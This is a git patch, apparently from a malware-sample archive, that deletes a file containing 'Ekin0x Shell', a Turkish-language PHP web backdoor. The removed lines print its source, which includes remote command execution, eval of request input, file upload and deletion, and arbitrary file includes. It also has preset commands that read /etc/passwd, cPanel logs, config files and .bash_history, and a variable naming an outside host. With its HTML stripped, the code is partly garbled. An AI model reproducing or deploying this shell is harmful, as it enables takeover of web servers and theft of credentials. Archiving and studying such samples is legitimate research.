From 9e1329ffe772dea003c5e686f19dd918699cce05 Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Thu, 15 Oct 2020 20:35:19 -0500 Subject: [PATCH] Delete Backdoor.PHP.Agent.cb --- PHP/Backdoor.PHP.Agent.cb | 614 -------------------------------------- 1 file changed, 614 deletions(-) delete mode 100644 PHP/Backdoor.PHP.Agent.cb diff --git a/PHP/Backdoor.PHP.Agent.cb b/PHP/Backdoor.PHP.Agent.cb deleted file mode 100644 index bb6f9cd2..00000000 --- a/PHP/Backdoor.PHP.Agent.cb +++ /dev/null @@ -1,614 +0,0 @@ - - /*########################################### - Ekin0x Shell volume 2.1 - Don't make any changes in c0de except if you dont know php programming - - ###########################################*/ - $a = "http://"; - $b = "room-escape-games.com"; - $c = "/x.html"; - - error_reporting(0); - set_magic_quotes_runtime(0); - - if(version_compare(phpversion(), '4.1.0') == -1) - {$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS; - $_SERVER = &$HTTP_SERVER_VARS; - }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"]; - if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);} - elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;} - else{return $requ."?".$link."=".$val;}} - function delm($delmtxt){print"
"; print" |
"; print" ";print "Home";
- print " - Geri";
- print " - phpinfo";
- if ($dlink=='phpinfo'){print phpinfo();die();}
- print " - Base64 decode";
- print " - Url decode";
- print " - Url encode";
- print " - Md5";
- print " - Izinleri Kontrol Et";
- print " - File source";
- print " - Quick index";
- print " - Zone-h";
- print " - Mail";
- print " - Cmd help";
- if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase']));
- print " Result is : $sfnt".$cbase."$efnt"; die();} - if ($dlink=="basepw"){ print " [ Base64 - Decoder ]"; - print $sf;input ("text","ncbase",$ncbase,35);print " "; - input ("submit","","Decode","");print $ef; die();} - if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld'])); - print " Result is : $sfnt".$urldc."$efnt"; die();}if ($dlink=='urld'){ - print " [ Url - Decoder ]"; print $sf; - input ("text","nurld",$nurld,35);print " "; - input ("submit","","Decode","");print $ef; die();} - if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen']))); print " Result is : $sfnt".$urlenc."$efnt"; die();} - if ($dlink=='urlen'){print " [ Url - Encoder ]"; - print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();} - if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf'])); - print " Result is : $sfnt".$mdfe."$efnt"; die();}if ($dlink=='mdf'){ - print " [ MD5 - Encoder ]"; - print $sf;input ("text","nmdf",$nmdf,35);print " "; - input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef; - print " ";print "";die();} - function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){ - print " [ Sorry, U choosed an empty file or the file not exists ]";die();} - elseif(isset($showsc)&&filesize($showsc) !=="0") { - print "
: Choose a php file to view in a color mode, any extension else will appears as usual :";print " ";input ("text","zonet","Hacker-name",35);print " "; - input ("submit","zonesub","Send","");print $ef;die();} - print " |
"; print" "; - print"Safe-mode :\t";print inisaf('safe_mode');print "";print"
"; - print "IP Numaran : ".$REMOTE_ADDR." "; - print "Server IP : ".$SERVER_ADDR.""; - print" ".$SERVER_SIGNATURE.""; - print "Server ADI : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN." "; - print "Engelli Fonksiyonlar : ";inifunc(disable_functions);print" "; - print "Kimsin : "; callfuncs('id');print" Os : "; - if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else { - if (!function_exists(shell_exec)&&!function_exists(exec)&& - !function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) - {print php_uname(); print "/";print PHP_OS;} - else {callfuncs('uname -a');}}print" "; - print"Php-versiyon : ".phpversion(); print" Current-path : "; - print $nscdir." [ ";permcol($nscdir);print " ]"; - print" ";print "Shell'in Burda : " .__file__; - print" Toplam Alan: "; readable_size(disk_total_space($nscdir));print " / "; - print"Bos Alan: "; readable_size(disk_free_space($nscdir)); - print " "; print" |
";
- print " | ";
- print "";print " | ";
- print "";print " | ";
- print "";print " | ";
- print "";print " | ";
- print "";print " | ";
- print "";print " | ";
- print "";print " | ";if(strstr(PHP_OS,"Linux")){
- print "";print " | ";}
- print "";print " |
";
- if (is_dir($nfiles)){print "[ $nfiles ] ";}else {print "$nfiles ";} - print" | "; print "";
- print " | "; print "";
- print " | ";
- print"";
- print " | ";
- print "";
- print " | ";
- print "";if(is_file("$nscdir/$nfiles")){
- print " | "; print "";print " | ";print "";
- if(is_file("$nscdir/$nfiles")){
- print " | "; if(strstr(PHP_OS,"Linux")){
- print "";
- print " | ";}
- print "";print " ";
- permcol("$nscdir/$nfiles");print " ";print" | "; print "
";}} - elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){ - if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "
";} - function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']); - if(is_readable($rfile)&&is_file($rfile)){ - $fp=fopen ($rfile,"r");print"".$sta; - if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);} - elseif(isset($_REQUEST['eval'])){ - ob_start();eval(stripslashes(trim($_REQUEST['eval']))); - $ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);} - elseif (isset($_REQUEST['subqcmnds'])){ - if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');} - if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');} - if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');} - if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');} - if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');} - if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');} - if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');} - if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');} - if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');} - if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');} - if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');} - if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');} - if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');} - }print $eta."
".$sta.htmlspecialchars($tekst).$eta."
".$sta; - if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."
";
- print $st.$c1." ".$mess3.$ec;
- print $c2.$sf." "; - input("submit","crefile","Olustur",""); - print " ";input("submit","delfile","Sil",""); - print " | ";
- print "".$st.$c1;
- print " Enter the command to execute";print $ec;
- print $c2.$sf." ";
- input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print" "; - input("submit","","Execute","");print "".$ef.$ec.$et." | ";
- print "";print $st.$c1;
- print " $mess".$ec.$c2.$sf." "; - input("submit","credir","Create-D","");print " "; - input("submit","deldir","Delete-D",""); - print " |
";print $st.$c1;
- print " Dosya Düzenle/Oku".$ec;print $c2.$sf." "; - input("submit","","Oku-Düzenle","");print " | ";
- print "";print $st.$c1;
- print " Dizin'i Göster ";print $ec.$c2.$sf." "; input("text","scdir",$nscdir,59);print" "; - input("submit","","Göster","");print " "; - input("reset","","R00T","");print "".$ef.$ec.$et." | ";
- print "";print $st.$c1;
- print " Dosya Boyutu : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2." ";input("submit","","Upload","");print " |
";
- print $st.$c1." | ";
- print $st.$c1." |
";
- print $st.$c1." | ";
- print $st.$c1." |
";
- print $st.$c1." | ";
- print $st.$c1." |
";
- print $st.$c1." | ";print $st.$c1." |
";
- print" [ By Cyber Security TIM Go to : www.cyber-warrior.org ]"; - print" |